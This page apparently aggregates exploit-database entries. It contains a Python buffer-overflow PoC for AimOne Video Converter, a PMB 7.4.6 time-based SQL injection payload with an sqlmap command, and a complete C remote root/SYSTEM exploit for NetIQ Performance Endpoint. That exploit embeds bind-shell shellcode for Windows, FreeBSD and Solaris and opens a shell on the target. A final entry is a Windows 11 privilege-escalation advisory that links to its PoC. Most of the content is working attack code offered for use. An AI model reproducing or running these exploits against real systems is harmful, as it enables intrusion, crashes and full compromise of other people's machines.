## Title: AimOne Video Converter V2.04 Build 103 - Buffer Overflow (DoS) ## Author: nu11secur1ty ## Date: 01.05.2023 ## Vendor: https://aimone-video-converter.software.informer.com/, http://www.aimonesoft.com/ ## Software: https://aimone-video-converter.software.informer.com/download/?ca85d0 ## Reference: ## Description: The AimOne Video Converter V2.04 Build 103 suffers from buffer overflow and local Denial of Service. The registration form is not working properly and crashes the video converter. When the attacker decides to register the product. This can allow him to easily crack the software and do more bad things it depending on the case. ## STATUS: HIGH Vulnerability - CRITICAL [+] Exploit: ```Python #!/usr/bin/python # nu11secur1ty print("WELCOME to the AIMONE Video Converter 2.04 Build 103 - Buffer Overflow exploit builder...\n") input("Press any key to build the exploit...\n") buffer = "\x41" * 7000 try: f=open("PoC.txt","w") print("[+] Creating %s bytes exploit payload.." %len(buffer)) f.write(buffer) f.close() print("[+] The PoC file was created!") except: print("File cannot be created") ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/AimOne/AimOne-Video-Converter-V2.04-Build-103) ## Proof and Exploit: [href](https://streamable.com/v1hvbf) ## Time spent `00:35:00` ## Writing an exploit `00:15:00` -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>
HireHackking

PMB 7.4.6 - SQL Injection

HACKER · %s · %s

# Exploit Title: PMB 7.4.6 - SQL Injection # Google Dork: inurl:opac_css # Date: 2023-01-06 # Exploit Author: str0xo DZ (Walid Ben) https://github.com/Str0xo # Vendor Homepage: http://www.sigb.net # Software Link: http://forge.sigb.net/redmine/projects/pmb/files # Affected versions : <= 7.4.6 -==== Software Description ====- PMB is a completely free ILS (Integrated Library management System). The domain of software for libraries is almost exclusively occupied by proprietary products. We are some librarians, users and developers deploring this state of affairs. PMB is based on web technology. This is what we sometimes call a 'web-app'. PMB requires an HTTP server (such as Apache, but this is not an obligation), the MySQL database and the PHP language. The main functions of PMB are : * Supporting the UNIMARC format * Authorities management (authors, publishers, series, subjects...) * Management of loans, holds, borrowers... * A user-friendly configuration * The ability to import full bibliographic records * A user-friendly OPAC integrating a browser * Loans management with a module designed to serve even the very small establishments * Serials management * Simple administration procedures that can be handled easily even by the library staff... -==== Vulnerability ====- URL: https://localhost/opac_css/ajax.php?categ=storage&datetime=undefined&id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))SHde)&module=ajax&sub=save&token=undefined Parameter: id -==== Vulnerability Details ====- URL encoded GET input id was set to if(now()=sysdate(),sleep(6),0) Tests performed: if(now()=sysdate(),sleep(15),0) => 15.43 if(now()=sysdate(),sleep(6),0) => 6.445 if(now()=sysdate(),sleep(15),0) => 15.421 if(now()=sysdate(),sleep(3),0) => 3.409 if(now()=sysdate(),sleep(0),0) => 0.415 if(now()=sysdate(),sleep(0),0) => 0.413 if(now()=sysdate(),sleep(6),0) => 6.41 Using SQLMAP : sqlmap -u "http://localhost/pmb/opac_css/ajax.php?categ=storage&datetime=undefined&id=1&module=ajax&sub=save&token=undefined" -p "id"
HireHackking
/* # Exploit Title: NetIQ/Microfocus Performance Endpoint v5.1 - remote root/SYSTEM exploit # Date: Jun 2007 # Exploit Author: mu-b # Vendor Homepage: https://www.microfocus.com/en-us/cyberres/identity-access-management # Version: All # Tested on: Windows / Solaris x86/SPARC # CVE : 0day * endpoint-pown-uni.c * * Copyright (c) 2007 by <mu-b@digit-labs.org> * * NetIQ Performance Endpoint <=5.1 remote root/SYSTEM exploit * by mu-b - Jun 2007 * * $Id: endpoint-pown-uni.c 56 2021-04-23 10:15:49Z mu-b $ * * - Tested on: NetIQ Performance Endpoint 5.1.15750 (win32) * (Revised: December, 2012) * NetIQ Performance Endpoint 5.1.15541 (win32) * (Revised: December, 2012) * NetIQ Performance Endpoint 5.1.15368 (win32) * (Revised: December, 2012) * NetIQ Performance Endpoint 5.1 (win32) * NetIQ Performance Endpoint 4.2 (freebsd-x86) * NetIQ Performance Endpoint 5.1 (solaris-SPARC+noexec-stack) * (Revised: May 23, 2006) * * * "No executable code (like Java or Visual Basic) is sent. There is no way * to do something like 'run this command.' 100,000’s of endpoints have been * installed worldwide without incident." * * "Endpoints do rigorous internal validation. For example, endpoints are not * susceptible to 'buffer overrun' attacks used by hackers." * - https://tinyurl.com/lgmblyj * * - Private Source Code -DO NOT DISTRIBUTE - * http://www.digit-labs.org/ -- Digit-Labs 2007!@$! */ #include <stdio.h> #include <stdlib.h> #include <arpa/inet.h> #include <assert.h> #include <ifaddrs.h> #include <limits.h> #include <net/if.h> #include <netinet/in.h> #include <netdb.h> #include <signal.h> #include <string.h> #include <sys/ioctl.h> #include <sys/types.h> #include <sys/wait.h> #include <time.h> #include <unistd.h> #define IPV4_BUFLEN 16 /* "255.255.255.255\0" */ #define PORT_SHELL 10000 #define ENDPT_TCP_PORT 10115 #define ENDPT_PKTMAX 0x1388 static char ppkt_buf1[] = "\x06" /* ENDPT_COMMAND_SETUP_E1 */ "\x07\x14\x43\x1A" /* verify_get_id (1) */ "\x00\x22" /* copyright_smart_compare */ "Copyright Ganymede Software Inc." "\x00\x03" /* */ "\xff" /* code_convert_from_line */ "\x00\x03" /* */ "\xff" /* code_convert_from_line */ "\x00" /* */ "\x00\x02" /* len < 0x80 */ "\x00\x03" /* len < 0x40 */ "\x00" /* len < 0x40 */ "\x41\x41\x41\x41\x41\x41\x41\x41" /* */ "\x41\x41\x41\x41\x41\x41\x41\x41" /* */ "\x02" /* protocol */ "\x00\x03" /* len < 0x40 */ "\x00" /* */ "\x00\x03" /* len < 0x40 */ "\x00" /* */ "\x00\x03" /* len < 0x40 */ "\x00" /* */ "\x00\x03" /* len < 0x40 */ "\x00" /* */ "\x41\x41\x41\x41\x41\x41" /* */ "\x00\x00\x00\x01" /* */ "\x00\x00\x00\x02" /* 218h */ "\x00" /* */ "\x01" /* 1ACh */ "\x00\x00" /* */ "\x00" /* 254h */ "\x02" /* protocol */ "\x00\x03" /* len < 0x40 */ "\x00"; /* */ static char ppkt_buf1_end[] = "\x00\x03" /* len < 0x40 */ "\x00" /* */ "\x00\x03" /* len < 0x40 */ "\x00" /* */ "\x00" /* */ "\x00\x03" /* len < 0x40 */ "\x00"; /* */ static char ppkt_buf2[] = "\x06" /* ENDPT_COMMAND_SETUP_E1 */ "\x07\x14\x43\x1A" /* verify_get_id (1) */ "\x00\x22" /* copyright_smart_compare */ "Copyright Ganymede Software Inc." "\x00\x03" /* */ "\xff" /* code_convert_from_line */ "\x00\x03" /* */ "\xff" /* code_convert_from_line */ "\x02" /* protocol */ "\x00\x03" /* len < 0x40 */ "\x00" /* */ "\x00\x03" /* len < 0x40 */ "\x00" /* */ "\x00\x03" /* len < 0x40 */ "\x00" /* */ "\x00\x03" /* len < 0x40 */ "\x00" /* */ "\x69" /* 210h */ "\x00\x00\x00\x69" /* var_C */ "\x00\x02" /* */ "\x00\x00\x00\x69" /* var_C */ "\x00\x00\x00\x69" /* 218h */ "\x69" /* */ "\x01" /* 1ACh */ "\x00\x00" /* */ "\x69" /* 254h */ "\x02" /* protocol */ "\x00\x03" /* len < 0x40 */ "\x00"; /* */ static char ppkt_buf2_end[] = "\x00\x03" /* len < 0x40 */ "\x00" /* */ "\x00\x03" /* len < 0x40 */ "\x00" /* */ "\x69" /* 0A8h */ "\x00\x03" /* len < 0x40 */ "\x00"; /* */ static char cpkt_buf1[] = "\x07" "AAAA"; static char cpkt_buf2[] = "\x38" "\x00\x04" "AAAA"; static char x86_evil_len[] = "\x11\xc0"; /* adc eax, eax */ #define X86_NOP_BYTE 0x90 /* nop */ static char sparc_evil_len[] = "\x10\x80\x00\x3c"; /* ba */ static char sparc_nop[] = "\x01\x00\x00\x00"; /* nop */ static char hammer_buf[] = "\x00\x25\x38" "\x00\x20" "\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00"; static char win32_x86_bind[] = "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8e" "\x2b\xb7\x2a\x83\xeb\xfc\xe2\xf4\x72\x41\x5c\x67\x66\xd2\x48\xd5" "\x71\x4b\x3c\x46\xaa\x0f\x3c\x6f\xb2\xa0\xcb\x2f\xf6\x2a\x58\xa1" "\xc1\x33\x3c\x75\xae\x2a\x5c\x63\x05\x1f\x3c\x2b\x60\x1a\x77\xb3" "\x22\xaf\x77\x5e\x89\xea\x7d\x27\x8f\xe9\x5c\xde\xb5\x7f\x93\x02" "\xfb\xce\x3c\x75\xaa\x2a\x5c\x4c\x05\x27\xfc\xa1\xd1\x37\xb6\xc1" "\x8d\x07\x3c\xa3\xe2\x0f\xab\x4b\x4d\x1a\x6c\x4e\x05\x68\x87\xa1" "\xce\x27\x3c\x5a\x92\x86\x3c\x6a\x86\x75\xdf\xa4\xc0\x25\x5b\x7a" "\x71\xfd\xd1\x79\xe8\x43\x84\x18\xe6\x5c\xc4\x18\xd1\x7f\x48\xfa" "\xe6\xe0\x5a\xd6\xb5\x7b\x48\xfc\xd1\xa2\x52\x4c\x0f\xc6\xbf\x28" "\xdb\x41\xb5\xd5\x5e\x43\x6e\x23\x7b\x86\xe0\xd5\x58\x78\xe4\x79" "\xdd\x78\xf4\x79\xcd\x78\x48\xfa\xe8\x43\x90\x3a\xe8\x78\x3e\xcb" "\x1b\x43\x13\x30\xfe\xec\xe0\xd5\x58\x41\xa7\x7b\xdb\xd4\x67\x42" "\x2a\x86\x99\xc3\xd9\xd4\x61\x79\xdb\xd4\x67\x42\x6b\x62\x31\x63" "\xd9\xd4\x61\x7a\xda\x7f\xe2\xd5\x5e\xb8\xdf\xcd\xf7\xed\xce\x7d" "\x71\xfd\xe2\xd5\x5e\x4d\xdd\x4e\xe8\x43\xd4\x47\x07\xce\xdd\x7a" "\xd7\x02\x7b\xa3\x69\x41\xf3\xa3\x6c\x1a\x77\xd9\x24\xd5\xf5\x07" "\x70\x69\x9b\xb9\x03\x51\x8f\x81\x25\x80\xdf\x58\x70\x98\xa1\xd5" "\xfb\x6f\x48\xfc\xd5\x7c\xe5\x7b\xdf\x7a\xdd\x2b\xdf\x7a\xe2\x7b" "\x71\xfb\xdf\x87\x57\x2e\x79\x79\x71\xfd\xdd\xd5\x71\x1c\x48\xfa" "\x05\x7c\x4b\xa9\x4a\x4f\x48\xfc\xdc\xd4\x67\x42\x61\xe5\x57\x4a" "\xdd\xd4\x61\xd5\x5e\x2b\xb7\x2a"; static char freebsd_x86_bind[] = "\x6a\x61\x58\x99\x52\x68\x10\x02\x27\x10\x89\xe1\x52\x42\x52\x42" "\x52\x6a\x10\xcd\x80\x99\x93\x51\x53\x52\x6a\x68\x58\xcd\x80\xb0" "\x6a\xcd\x80\x52\x53\x52\xb0\x1e\xcd\x80\x97\x6a\x02\x59\x6a\x5a" "\x58\x51\x57\x51\xcd\x80\x49\x79\xf5\x50\x68\x2f\x2f\x73\x68\x68" "\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x53\xb0\x3b\xcd\x80"; static char solaris_sparc_bind[] = "\x9c\x2b\xa0\x07\x98\x10\x20\x01\x96\x1a\xc0\x0b\x94\x1a\xc0\x0b" "\x92\x10\x20\x02\x90\x10\x20\x02\x82\x10\x20\xe6\x91\xd0\x20\x08" "\xd0\x23\xbf\xf8\x21\x00\x00\x89\xa0\x14\x23\x10\xe0\x23\xbf\xf0" "\xc0\x23\xbf\xf4\x92\x23\xa0\x10\x94\x10\x20\x10\x82\x10\x20\xe8" "\x91\xd0\x20\x08\xd0\x03\xbf\xf8\x92\x10\x20\x01\x82\x10\x20\xe9" "\x91\xd0\x20\x08\xd0\x03\xbf\xf8\x92\x1a\x40\x09\x94\x12\x40\x09" "\x82\x10\x20\xea\x91\xd0\x20\x08\xd0\x23\xbf\xf8\x94\x10\x20\x03" "\x92\x10\x20\x09\x94\xa2\xa0\x01\x82\x10\x20\x3e\x91\xd0\x20\x08" "\x12\xbf\xff\xfc\xd0\x03\xbf\xf8\x94\x1a\xc0\x0b\x21\x0b\xd8\x9a" "\xa0\x14\x21\x6e\x23\x0b\xdc\xda\x90\x23\xa0\x10\x92\x23\xa0\x08" "\xe0\x3b\xbf\xf0\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b" "\x91\xd0\x20\x08"; static char solaris_x86_bind[] = "\xb8\xff\xff\xff\xff\xba\xfd\xff\xd8\xef\xf7\xd0\xf7\xd2\x50\x52" "\x89\xe7\x31\xdb\xf7\xe3\xb0\x02\x50\x52\x52\x50\x50\x50\xb0\xe6" "\xcd\x91\x93\x6a\x10\x57\x53\x52\xb0\xe8\xcd\x91\x52\x53\x52\xb0" "\xe9\xcd\x91\x52\x53\x6a\x02\xb0\xea\xcd\x91\x93\x92\x99\x59\x51" "\x52\xb0\x06\xcd\x91\x51\x6a\x09\x53\x52\xb0\x3e\xcd\x91\x83\xc4" "\x18\x49\x79\xeb\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89" "\xe3\x52\x53\x89\xe1\x52\x52\x51\x53\x52\xb0\x3b\xcd\x91"; #define NUM_TARGETS 7 #define ARCH_X86 0 #define ARCH_SPARC 1 struct target_t { const char *name; const char *zshell; const int zshell_len; const int zshell_pkt_len; const int fp_indx; const int fp_offset; const int arch; }; struct target_t targets[] = { { "NetIQ Endpoint 5.1.15750 - Microsoft Windows (universal)", win32_x86_bind, sizeof win32_x86_bind, 0x11c0, 33, 0x490, ARCH_X86 }, { "NetIQ Endpoint 5.1.15541 - Microsoft Windows (universal)", win32_x86_bind, sizeof win32_x86_bind, 0x11c0, 33, 0x490, ARCH_X86 }, { "NetIQ Endpoint 5.1.15368 - Microsoft Windows (universal)", win32_x86_bind, sizeof win32_x86_bind, 0x11c0, 33, 0x488, ARCH_X86 }, { "NetIQ Endpoint 5.1 - Microsoft Windows (universal)", win32_x86_bind, sizeof win32_x86_bind, 0x11c0, 33, 0x480, ARCH_X86 }, { "NetIQ Endpoint 5.1 - FreeBSD (universal)", freebsd_x86_bind, sizeof freebsd_x86_bind, 0x11c0, 29, 0x3FC, ARCH_X86 }, { "NetIQ Endpoint 5.1 - Solaris SPARC (universal)", solaris_sparc_bind, sizeof solaris_sparc_bind, 0x1080, 29, 0x400, ARCH_SPARC }, { "NetIQ Endpoint 5.1 - Solaris x86 (universal)", solaris_x86_bind, sizeof solaris_x86_bind, 0x11c0, 29, 0x400, ARCH_X86 }, {0} }; static const char *quotes[] = { " \"No executable code (like Java or Visual Basic) is sent. There is no way\n" " to do something like 'run this command.' 100,000’s of endpoints have been\n" " installed worldwide without incident.\"", " \"Endpoints do rigorous internal validation. For example, endpoints are not\n" " susceptible to 'buffer overrun' attacks used by hackers.\"" }; static int verbose = 1; /* verbosity */ static int ppid, cpid; /* parent and child process id's */ static int get_localip_getifaddrs (in_addr_t *); static int sock_send (int, char *, int); static int sock_recv (int, char *, int); static int sock_recv_str (int, char *, int); static void shellami (int); static void fatal (void) { kill (0, SIGKILL); exit (EXIT_FAILURE); } static int get_localip_getifaddrs (in_addr_t *ip_addr) { struct ifaddrs *ifa_head; int result; result = -1; if (getifaddrs (&ifa_head) == 0) { struct ifaddrs *ifa_cur; for (ifa_cur = ifa_head; ifa_cur; ifa_cur = ifa_cur->ifa_next) { if (ifa_cur->ifa_name != NULL && ifa_cur->ifa_addr != NULL) { if (ifa_cur->ifa_addr->sa_family != AF_INET || !(ifa_cur->ifa_flags & IFF_UP)) continue; if (ifa_cur->ifa_flags & IFF_LOOPBACK) continue; memcpy (ip_addr, &((struct sockaddr_in *) ifa_cur->ifa_addr)->sin_addr, sizeof *ip_addr); result = 0; break; } } freeifaddrs (ifa_head); } return (result); } static int sock_send (int fd, char *src, int len) { int n; if ((n = send (fd, src, len, 0)) < 0) { perror ("send()"); exit (EXIT_FAILURE); } return (n); } static int sock_recv (int fd, char *dst, int len) { int n; if ((n = recv (fd, dst, len, 0)) < 0) { perror ("recv()"); exit (EXIT_FAILURE); } return (n); } static int sock_recv_str (int fd, char *dst, int len) { int n = sock_recv (fd, dst, len - 1); dst[n] = '\0'; return (n); } static void shellami (int fd) { int n; fd_set rset; char rbuf[1024]; while (1) { FD_ZERO (&rset); FD_SET (fd, &rset); FD_SET (STDIN_FILENO, &rset); if (select (fd + 1, &rset, NULL, NULL, NULL) < 0) { perror ("select()"); fatal (); } if (FD_ISSET (fd, &rset)) { if ((n = sock_recv_str (fd, rbuf, sizeof (rbuf) - 1)) <= 0) { fprintf (stderr, "Connection closed by foreign host.\n"); exit (EXIT_SUCCESS); } printf ("%s", rbuf); fflush (stdout); } if (FD_ISSET (STDIN_FILENO, &rset)) { if ((n = read (STDIN_FILENO, rbuf, sizeof (rbuf) - 1)) > 0) { rbuf[n] = '\0'; sock_send (fd, rbuf, n); } } } } static int sockami (char *host, int port) { struct sockaddr_in address; struct hostent *hp; int fd; fflush (stdout); if ((fd = socket (AF_INET, SOCK_STREAM, 0)) == -1) { perror ("socket()"); exit (EXIT_FAILURE); } if ((hp = gethostbyname (host)) == NULL) { perror ("gethostbyname()"); exit (EXIT_FAILURE); } memset (&address, 0, sizeof (address)); memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length); address.sin_family = AF_INET; address.sin_port = htons (port); if (connect (fd, (struct sockaddr *) &address, sizeof (address)) < 0) { perror ("connect()"); return (-1); } return (fd); } int endpt_add_string (char *buf, char *str) { unsigned int str_len; unsigned short str_lens; assert (buf != NULL && str != NULL); str_len = 2 + strlen (str) + 1; str_lens = htons (str_len); /* add the string length and copy, including NULL */ *((unsigned short *) buf) = str_lens; memcpy (buf + 2, str, str_len - 2); return (str_len); } char * endpt_read_packet (int fd, char *buf) { unsigned short pkt_len; int n; n = sock_recv (fd, (char *) &pkt_len, sizeof pkt_len); if (n < 2) { fprintf (stderr, "endpt_read_packet: failed reading length!\n"); return (NULL); } pkt_len = ntohs (pkt_len); if (pkt_len > ENDPT_PKTMAX) { fprintf (stderr, "endpt_read_packet: invalid packet length!\n"); return (NULL); } n = sock_recv (fd, buf, pkt_len - 2); if (n < pkt_len - 2) { fprintf (stderr, "endpt_read_packet: failed reading packet (%d read, need %d)!\n", n, pkt_len); return (NULL); } return (buf); } char * endpt_create_packet (char *buf, unsigned int len) { char *pkt_buf; unsigned int pkt_len; unsigned short pkt_lens; assert (buf != NULL && len > 0); assert (len <= UINT_MAX - 2); assert (len <= ENDPT_PKTMAX - 2); pkt_len = 2 + len; pkt_buf = malloc (pkt_len * sizeof (char)); if (pkt_buf == NULL) return (NULL); pkt_lens = htons (pkt_len); /* add the packet length and copy */ *((unsigned short *) pkt_buf) = pkt_lens; memcpy (pkt_buf + 2, buf, len); return (pkt_buf); } void endpt_listen_child (char *thost, struct target_t *trgt) { struct sockaddr_in servaddr, cliaddr; char pkt_buf[ENDPT_PKTMAX-2], *pkt_ptr, *ptr; unsigned int var_30_ptr; int lfd, cfd, sfd, pid; socklen_t clilen; sleep (1); pid = getpid (); if ((lfd = socket (PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) { perror ("socket()"); fatal (); } memset (&servaddr, 0, sizeof servaddr); servaddr.sin_family = AF_INET; servaddr.sin_addr.s_addr = htonl (INADDR_ANY); servaddr.sin_port = htons (ENDPT_TCP_PORT); if (bind (lfd, (struct sockaddr *) &servaddr, sizeof servaddr) < 0) { perror ("bind()"); fatal (); } if (listen (lfd, 2) < 0) { perror ("listen()"); fatal (); } clilen = sizeof cliaddr; if ((cfd = accept (lfd, (struct sockaddr *) &cliaddr, &clilen)) < 0) { perror ("accept()"); fatal (); } printf ("[child-%d] connection accepted from %s:%d\n", pid, inet_ntoa (cliaddr.sin_addr), ntohs (cliaddr.sin_port)); printf ("[child-%d] reading first packet...", pid); /* read dummy packet */ if ((ptr = endpt_read_packet (cfd, pkt_buf)) == NULL) { close (cfd); fatal (); } printf ("done\n"); printf ("[child-%d] sending first reply...", pid); pkt_ptr = endpt_create_packet (cpkt_buf1, sizeof cpkt_buf1 - 1); sock_send (cfd, pkt_ptr, (sizeof cpkt_buf1 - 1) + 2); free (pkt_ptr); printf ("done\n"); printf ("[child-%d] reading second packet...", pid); /* read dummy packet */ if ((ptr = endpt_read_packet (cfd, pkt_buf)) == NULL) { close (cfd); fatal (); } printf ("done\n"); printf ("[child-%d] reading third packet...", pid); if ((ptr = endpt_read_packet (cfd, pkt_buf)) == NULL) { close (cfd); fatal (); } memcpy (&var_30_ptr, pkt_buf + 3, sizeof var_30_ptr); printf ("done\n"); printf ("[child-%d] MAGIC COOKIE: 0x%08x\n", pid, var_30_ptr); memcpy (&cpkt_buf2[3], &var_30_ptr, sizeof var_30_ptr); printf ("[child-%d] reading fourth packet...", pid); /* read dummy packet */ if ((ptr = endpt_read_packet (cfd, pkt_buf)) == NULL) { close (cfd); fatal (); } printf ("done\n"); printf ("[child-%d] reading fifth packet...", pid); if ((ptr = endpt_read_packet (cfd, pkt_buf)) == NULL) { close (cfd); fatal (); } memcpy (&var_30_ptr, pkt_buf + 3, sizeof var_30_ptr); printf ("done\n"); printf ("[child-%d] MAGIC COOKIE: 0x%08x\n", pid, var_30_ptr); memcpy (&cpkt_buf2[3], &var_30_ptr, sizeof var_30_ptr); printf ("[child-%d] sending second reply...", pid); pkt_ptr = endpt_create_packet (cpkt_buf2, sizeof cpkt_buf2 - 1); sock_send (cfd, pkt_ptr, (sizeof cpkt_buf2 - 1) + 2); free (pkt_ptr); printf ("done\n"); printf ("[child-%d] sending evil buffer...", pid); ptr = pkt_buf; if (trgt->arch == ARCH_X86) { memcpy (ptr, x86_evil_len, sizeof x86_evil_len); ptr += sizeof x86_evil_len - 1; memset (ptr, X86_NOP_BYTE, 0x11c0 - 2); } else if (trgt->arch == ARCH_SPARC) { int i; for (i = 0; i < 2; i++, ptr += sizeof sparc_evil_len - 1) memcpy (ptr, sparc_evil_len, sizeof sparc_evil_len); for (i = 0; i < 80; i++, ptr += sizeof sparc_nop - 1) memcpy (ptr, sparc_nop, sizeof sparc_nop); } else { fprintf (stderr, "opps\n"); exit (EXIT_FAILURE); } memcpy (&pkt_buf[256], trgt->zshell, trgt->zshell_len - 1); sock_send (cfd, pkt_buf, trgt->zshell_pkt_len); printf ("done\n"); printf ("[child-%d] sending hammer buffer...", pid); ptr = pkt_buf; memcpy (ptr, hammer_buf, sizeof hammer_buf); memcpy (&pkt_buf[5], &var_30_ptr, sizeof var_30_ptr); if (trgt->arch == ARCH_SPARC) var_30_ptr = ntohl (var_30_ptr); var_30_ptr -= trgt->fp_offset - 0x08; if (trgt->arch == ARCH_SPARC) var_30_ptr = htonl (var_30_ptr); memcpy (&pkt_buf[trgt->fp_indx], &var_30_ptr, sizeof var_30_ptr); sock_send (cfd, pkt_buf, sizeof hammer_buf - 1); printf ("done\n"); printf ("[child-%d] waiting for the shellcode to be executed...\n", pid); sleep (3); if ((sfd = sockami (thost, PORT_SHELL)) != -1) { printf ("+Wh00t!\n\n"); shellami (sfd); } sleep (1); close (cfd); } void endpt_parent (char *thost) { struct in_addr ip_addr; char ip_buf[IPV4_BUFLEN], pkt_buf[ENDPT_PKTMAX-2], *pkt_ptr, *ptr; int fd; get_localip_getifaddrs (&ip_addr.s_addr); strncpy (ip_buf, inet_ntoa (ip_addr), sizeof ip_buf); ip_buf[sizeof ip_buf - 1] = '\0'; if (verbose) fprintf (stderr, "[parent-%d] source address %s\n", ppid, ip_buf); fflush (stdout); printf ("[parent-%d] connecting to %s:%d...", ppid, thost, ENDPT_TCP_PORT); if ((fd = sockami (thost, ENDPT_TCP_PORT)) < 0) fatal (); printf ("done\n"); printf ("[parent-%d] building first packet...", ppid); ptr = pkt_buf; memcpy (ptr, ppkt_buf1, sizeof ppkt_buf1); ptr += sizeof ppkt_buf1 - 1; /* add the connect-back IP */ ptr += endpt_add_string (ptr, ip_buf); memcpy (ptr, ppkt_buf1_end, sizeof ppkt_buf1_end); ptr += sizeof ppkt_buf1_end - 1; pkt_ptr = endpt_create_packet (pkt_buf, ptr - pkt_buf); printf ("done\n"); sock_send (fd, pkt_ptr, (ptr - pkt_buf) + 2); free (pkt_ptr); printf ("[parent-%d] building second packet...", ppid); ptr = pkt_buf; memcpy (ptr, ppkt_buf2, sizeof ppkt_buf2); ptr += sizeof ppkt_buf2 - 1; /* add the connect-back IP */ ptr += endpt_add_string (ptr, ip_buf); memcpy (ptr, ppkt_buf2_end, sizeof ppkt_buf2_end); ptr += sizeof ppkt_buf2_end - 1; pkt_ptr = endpt_create_packet (pkt_buf, ptr - pkt_buf); printf ("done\n"); sock_send (fd, pkt_ptr, (ptr - pkt_buf) + 2); printf ("[parent-%d] building third packet...done\n", ppid); sock_send (fd, pkt_ptr, (ptr - pkt_buf) + 2); free (pkt_ptr); sleep (2); printf ("[parent-%d] closing socket...done\n", ppid); close (fd); } int main (int argc, char **argv) { struct target_t *trgt; int i, cret; printf ("NetIQ Performance Endpoint <=5.1 remote root/SYSTEM exploit\n" "by: <mu-b@digit-labs.org>\n" "http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n"); if (argc <= 2) { fprintf (stderr, "Usage: %s <host> <target>\n", argv[0]); for (i = 0; targets[i].name; i++) fprintf (stderr, "\t%d) %s\n", i, targets[i].name); fprintf (stderr, "\n"); exit (EXIT_SUCCESS); } if (atoi (argv[2]) >= NUM_TARGETS) { fprintf (stderr, "Only %d targets known!!\n", NUM_TARGETS); exit (EXIT_SUCCESS); } trgt = &targets[atoi (argv[2])]; printf ("Target: %s\n\n", trgt->name); srand (time (NULL)); printf ("%s\n\t- https://tinyurl.com/lgmblyj\n\n", quotes[rand() & 1]); ppid = getpid (); if ((cpid = fork ()) < 0) { perror ("fark()"); exit (EXIT_FAILURE); } else if (cpid == 0) { /* child */ endpt_listen_child (argv[1], trgt); exit (EXIT_SUCCESS); } /* parent */ endpt_parent (argv[1]); /* wait for child */ wait (&cret); if (verbose) fprintf (stderr, "[parent-%d] child-%d exited %d\n", ppid, cpid, cret); return (EXIT_SUCCESS); }
HireHackking

Windows 11 10.0.22000 - Backup service Privilege Escalation

HACKER · %s · %s

## Title: Windows 11 10.0.22000 - Backup service Privilege Escalation ## Author: nu11secur1ty ## Date: 01.13.2023 ## Vendor: https://www.microsoft.com/ ## Software: https://www.microsoft.com/en-us/software-download/windows11 ## Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-21752 ## Description: Windows 11 Pro build 10.0.22000 Build 22000 suffers from Backup service - Privilege Escalation vulnerability. An attacker who successfully exploited this vulnerability could gain SYSTEM privileges. and could delete data that could include data that results in the service being unavailable. ## STATUS: HIGH Vulnerability - CRITICAL [+] Exploit: [href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-21752/PoC) ## Reference: [href](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-21752) ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-21752/PoC) ## Proof and Exploit: [href](https://streamable.com/f2dl3m) -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://0day.today/ https://cxsecurity.com/ and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>